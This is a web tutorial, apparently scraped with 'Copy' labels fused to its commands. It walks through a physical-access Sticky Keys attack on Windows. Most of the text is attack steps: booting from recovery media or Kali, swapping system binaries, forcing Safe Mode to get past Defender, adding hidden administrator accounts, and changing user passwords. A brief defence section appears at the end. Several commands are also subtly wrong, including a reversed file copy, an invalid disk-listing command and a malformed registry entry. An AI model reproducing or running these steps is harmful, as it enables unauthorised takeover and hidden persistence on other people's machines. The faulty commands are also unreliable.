How to Perform a Sticky Keys Attack and Hide Users in Windows

Intro

This guide explains how to use vulnerabilities in Windows to gain access to a system. The attack uses Sticky Keys or interacts directly with system files. Let’s dive in!

Part 1: Using a Windows Boot Disk

1. Change Boot Order to Load Another OS

First, boot your PC with a changed boot order. Go to the "Recovery" screen, click "Troubleshoot" > "Advanced Options" > "Command Prompt" (this is where we get started).

2. List All Disks

Copywmi get name

3. Access Your Disk and Go to System Folder

CopyD:

Copycd \windows\system32

4. Replace sethc.exe with cmd.exe or ftp.exe

Copycopy sethc.exe cmd.exe

Note: If Defender blocks you, try using FTP as described below.

5. Reboot the System

Copyshutdown /r /f /t 0

Part 2: Bypassing Defender Restrictions

If Defender is blocking your attack, here are a few ways to bypass it:

1. Use ftp.exe Instead of cmd.exe

You can use the !cmd command to access CMD from ftp.exe.

2. Boot in Safe Mode

Safe Mode is a minimal boot where third-party software like Defender doesn’t run. To boot into Safe Mode:

Copybcdedit /set {default} safeboot minimal

Copyshutdown /f /r /t 0

To exit Safe Mode:

Copybcdedit /deletevalue {default} safeboot

Part 3: Adding Users and Escalating Privileges

1. View the User List

Copynet user

2. Add a New User

Copynet user new_username Pa$$w0rd /add

3. Change a User’s Password

Copynet user username Pa$$w0rd

4. Add a User to the Admin Group

Copynet localgroup administrators username /add

5. Hide Users

To hide a user from the login screen, go to the Registry Editor and add this key:

Copy[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

Copy"SpecialAccounts"="hidden_user"

Part 4: Working with Kali Linux

1. Change Boot Order and Load Kali

Insert your Kali USB or CD and change the boot order to load Kali Linux. Open the terminal and mount the Windows disk:

Copyfdisk -l

Copymount /dev/sda2 /mnt

Copycd /mnt/Windows/System32

2. Replace sethc.exe with cmd.exe

Copycp sethc.exe cmd.exe

3. Sync the Changes

Copysync

4. Unmount the Disk

Copyumount /mnt

Part 5: Defending Against Sticky Keys Attacks

How to Protect Your Computer:

• Set a BIOS Password: Add a password to your BIOS to prevent anyone from changing the boot order.
  Note: Removing the CMOS battery will reset the password, so consider other security measures.
• Disk Encryption: Use something like Bitlocker to encrypt your disk and prevent unauthorized access.
• Physical Security: Keep your computer in a secure physical location.

Conclusion

In this guide, we covered how to exploit vulnerabilities in Windows to change system files and access the system using Sticky Keys and the Command Prompt. We also walked through adding users, escalating privileges, and hiding users. Lastly, we provided some tips on protecting your system from these kinds of attacks.

If you want to dive deeper into more advanced topics or learn how to defend against these attacks, make sure to check out more of our guides.